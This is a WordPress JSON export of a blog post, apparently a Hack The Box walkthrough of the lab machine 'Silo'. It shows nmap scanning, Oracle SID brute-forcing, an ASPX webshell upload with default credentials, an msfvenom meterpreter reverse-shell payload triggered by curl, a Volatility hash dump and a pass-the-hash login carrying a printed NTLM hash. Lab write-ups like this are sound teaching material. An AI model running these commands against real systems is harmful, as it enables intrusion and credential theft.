{"id":30,"date":"2021-02-10T10:01:08","date_gmt":"2021-02-10T10:01:08","guid":{"rendered":"https:\/\/areyou1or0.it\/?p=30"},"modified":"2021-02-10T10:01:22","modified_gmt":"2021-02-10T10:01:22","slug":"htb-silo","status":"publish","type":"post","link":"https:\/\/areyou1or0.it\/index.php\/2021\/02\/10\/htb-silo\/","title":{"rendered":"HTB: Silo"},"content":{"rendered":"\n<h2>Enumeration<\/h2>\n\n\n\n<h2>nmap<\/h2>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/0zhsBeOgN85i0CrFidSxi96LghEvoTcG-0m4H6bsSyAKUzL_gBfYIzX6LT4vO26P1qbu-Q7qU5rkvmYzMejyhu4JUErfT46E9SjW4-_T42TeVmTf4iIp21jVmpv92E7mgHt5FS8a\" alt=\"nmap -sv 10. 10. 10.82 -OA nmap \nstarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-01-08 07:28 EST \nNmap scan report for 10.10. 10.82 \nHost is up (0.66s latency). \nNot shown: \nPORT \n80\/tcp \n135\/tcp \n139\/tcp \n445\/tcp \n1521\/tcp \n49152\/tcp \n49153\/tcp \n49154\/tcp \n49155\/tcp \n49158\/tcp \n49160\/tcp \n49161\/tcp \n988 closed ports \nSTATE \nopen \nopen \nopen \nopen \nopen \nopen \nopen \nopen \nopen \nopen \nopen \nopen \nSERVICE \nhttp \nmsrpc \nnetbios-ssn \nmicrosoft-ds \noracle-tns \nmsrpc \nmsrpc \nmsrpc \nmsrpc \nmsrpc \noracle-tns \nmsrpc \nService Info: OSS : Windows, \nVERSION \nMicrosoft IIS httpd 8.5 \nMicrosoft Windows RPC \nMicrosoft Windows netbios-ssn \nMicrosoft Windows Server 2008 R2 \n2012 microsoft-ds \nOracle TNS listener 11.2.0.2.0 (unauthorized) \nMicrosoft Windows RPC \nMicrosoft Windows RPC \nMicrosoft Windows RPC \nMicrosoft Windows RPC \nMicrosoft Windows RPC \nOracle TNS listener (requires service name) \nMicrosoft Windows RPC \nWindows Server 2008 R2 \n2012; CPE: cpe:\/o:microsoft:windows\"\/><\/figure>\n\n\n\n<h2>SID Enumeration<\/h2>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/DaM6YcEj_szl0Pf5r4KdFHZojxRSvJSvHOQeyyQUBCgijqITiTXTyc1C9HMAagT9AwOsIfWnzOSy231ttp_wGHUUOHP1Sq2Py6GndLWtMv5l6w5rxuFVBJGKWFr8KrJu4UVatUA6\" alt=\"msf5 auxiliary(scanner\/oracle\/sid brute} \n&gt; set RHOSTS \nRHOSTS -3 \nmsf5 auxiliary(scanner\/oracle\/sid brute} \n&gt; run \nSIDS against \nChecking \nCaught \n571 \nChecking \n- Refused \nChecking \n- Refused \nChecking \nLINUX8174 \n'ORACLE' \nORACLE' \n[+1 \nOracle \nOracle \nOracle \nOracle \nOracle \nOracle \nOracle \nOracle \nOracle \nOracle \nOracle \ninterrupt from \n'XE' is valid \nChecking 'ASD8' \n- Refused 'ASD8' \nChecking 'IASD8' \n- Refused 'IASD8' \nChecking \nthe console.\"\/><\/figure>\n\n\n\n<h2>Password Guesser &#8211; odat<\/h2>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/7U9aMhLcPqtl5EUgapzdbotrNspndAF4FHljQNCQuuTasxMkKMYmhZMhMvbD_z7VMvXh8lwvhTvpCUsx6djZ2S5GxKzzTdv2DjLj1xBCl8La_snbQcv0rdCjoHlZNEMdy4JsCucr\" alt=\"\"\/><\/figure>\n\n\n\n<h2>Uploading aspx shell for command inejction<\/h2>\n\n\n\n<p>.\/odat-libc2.5-x86_64 dbmsxslprocessor -s 10.10.10.82 -d XE -U scott -P tiger &#8211;putFile &#8216;C:\\inetpub\\wwwroot\\&#8217; &#8216;shell.aspx&#8217; \/usr\/share\/webshells\/aspx\/cmdasp.aspx &#8211;sysdba<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/0nhYgj2gGdXP9RQZ6yia1_N07P_qr_iZFg7Zv7vn434EeEBYOZXHLK2Xaau7RnL0Fc5eovhZ5AdKNvFifsbOLSPEVY0fBMQYAxmIrtHCstwdV61uMNZ0lnNtS8K2kyUnvin9OFr9\" alt=\"\"\/><\/figure>\n\n\n\n<h2>Reverse Shell<\/h2>\n\n\n\n<p>Or create msfvenom payload for reverse shellmsfvenom -p windows\/x64\/meterpreter\/reverse_tcp LHOST= LPORT= -f aspx &gt; lisa.aspx<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/8zhe-17bcYSWJA3-YMid2d0bc7BqJjmWe0fmlB6UYhr5y0ph5nauuNKv7EZynQPiVPYP3LjIFEWuWR3kPgQ6zSTNSBMXDghx86zH3S4h-xMno83Nbc_VKGlh6k78rGza1R_CAXxi\" alt=\"\"\/><\/figure>\n\n\n\n<p>Upload the file.\/odat-libc2.5-x86_64 dbmsxslprocessor -s 10.10.10.82 -d XE -U scott -P tiger &#8211;putFile &#8216;C:\\inetpub\\wwwroot\\&#8217; &#8216;lisa.aspx&#8217; \/root\/odat2.5\/lisa.aspx &#8211;sysdba<br>Call the file for the reverse shellcurl <a href=\"#\">http:\/\/10.10.10.82\/lisa.aspx<\/a><\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/pOOEy37Rd5luwjWEsfAi2h_OnR2r460jgUPMsoQBemlScJmWiPw6E30G5-vjWxqM1Gc0_HvOsPG7V1quRMxxRqjYg4R4tEmg8ArDZ5AK75yUJAkc1JKp_gp4A48Ou6PcFkpYcQYB\" alt=\"\"\/><\/figure>\n\n\n\n<h2>Privilege Escalation<\/h2>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/SQ-fEoOm8h3B-Bqn9lYQU8nCmPDYc5JS9eKKG7OAyAyeULJIj_lkjRYv-lk0fsqn__NVTp51QBMy4L4ZNppJgqmPbYyaIupreg01btNVb7JsgY8aojQgqzKMbqaePaTQ_8e1IoUu\" alt=\"\"\/><\/figure>\n\n\n\n<p>Download the fileIn the dump, to find the valuable info, use Volatile (check Github page)<\/p>\n\n\n\n<h2>Volatile<\/h2>\n\n\n\n<p>Suggested profiles:python vol.py -f \/root\/Downloads\/SILO-20180105-221806.dmp imageinfo<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/VkLTBSYWZG2eWsxdYDxIrn3bZ-4kP6uqlwpjN4KN8lEHOFQ_3nh7yierL2q9mFjDKvw56xCLiPsFc7y9PQScpndxuBqyOwMt7G8PjjOM2Fw2K4c-GoGp-lNfcECRREOl-_O-gzkM\" alt=\"\"\/><\/figure>\n\n\n\n<p>Sysinfo<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/o-xvwRzgIjASiq83PZXNK-dpq5gcQ1pdThNS3QHvXLUKJUtKCs6ZQ4dVu-VxiBZHFnsTY2Jvbcur-dQ2iHQhX9zsCTFI2MgCOSs6mSwUPmJLZY31Eq9BV6QVRdC0JsyTbeS_05XS\" alt=\"\"\/><\/figure>\n\n\n\n<p>python vol.py -f \/root\/Downloads\/SILO-20180105-221806.dmp &#8211;profile=Win2012R2x64 hivelist<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/NURgUJth7oLQ_QvuCQC2UhSaMzt9UTVRjO0RNXZ6X-HyAsROgJOk0OBWRXoweY3RbcjRFixkGVZH5bXjWje5zXrIK6H0jFrDf-FmR5jnv5XeFLu2pkD0rALVn8CY6r3jnId_t4Ej\" alt=\"\"\/><\/figure>\n\n\n\n<p>python vol.py -f \/root\/Downloads\/SILO-20180105-221806.dmp &#8211;profile=Win2012R2x64 -y 0xffffc00000028000 -s 0xffffc00000619000 hashdump<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/vRlERxb-l0xo5ap51p6yRsJ4Lb59gbc2NQhep9mJeU4DVG77biEmcwb-52_pMEaY6R7I9w_5VhL_wubWHjwbVGO3T99UmEkqMxcKNbmHK-5PuPqWGKMjMQ5a-jm-dvmsFtA-WIoF\" alt=\"\"\/><\/figure>\n\n\n\n<h2>Admin Shell &#8211; PasstheHash<\/h2>\n\n\n\n<p>pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 \/\/10.10.10.82 cmd.exe<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/pcKC3-hmJyuBxZF9P41nm2t9GcEXEXFX7RzXsS67ILpIV_WrL4FxcVZKz1DWgZhQ7Veb6tQsA6YEgfOiJIdUyxBvdZCKTbvXs1NG1FE5ds45NwJpY3fUK1Hnjp3IWf_9bjLGenoj\" alt=\"\"\/><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>Enumeration nmap SID Enumeration Password Guesser &#8211; odat Uploading aspx shell for command inejction .\/odat-libc2.5-x86_64 dbmsxslprocessor -s 10.10.10.82 -d XE -U scott -P tiger &#8211;putFile &#8216;C:\\inetpub\\wwwroot\\&#8217; &#8216;shell.aspx&#8217; \/usr\/share\/webshells\/aspx\/cmdasp.aspx &#8211;sysdba Reverse Shell Or create msfvenom payload for reverse shellmsfvenom -p windows\/x64\/meterpreter\/reverse_tcp LHOST= LPORT= -f aspx &gt; lisa.aspx Upload the file.\/odat-libc2.5-x86_64 dbmsxslprocessor -s 10.10.10.82 -d XE -U&hellip; <a class=\"more-link\" href=\"https:\/\/areyou1or0.it\/index.php\/2021\/02\/10\/htb-silo\/\">Continue reading <span class=\"screen-reader-text\">HTB: Silo<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[17],"tags":[],"_links":{"self":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/30"}],"collection":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/comments?post=30"}],"version-history":[{"count":1,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/30\/revisions"}],"predecessor-version":[{"id":31,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/30\/revisions\/31"}],"wp:attachment":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/media?parent=30"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/categories?post=30"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/tags?post=30"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}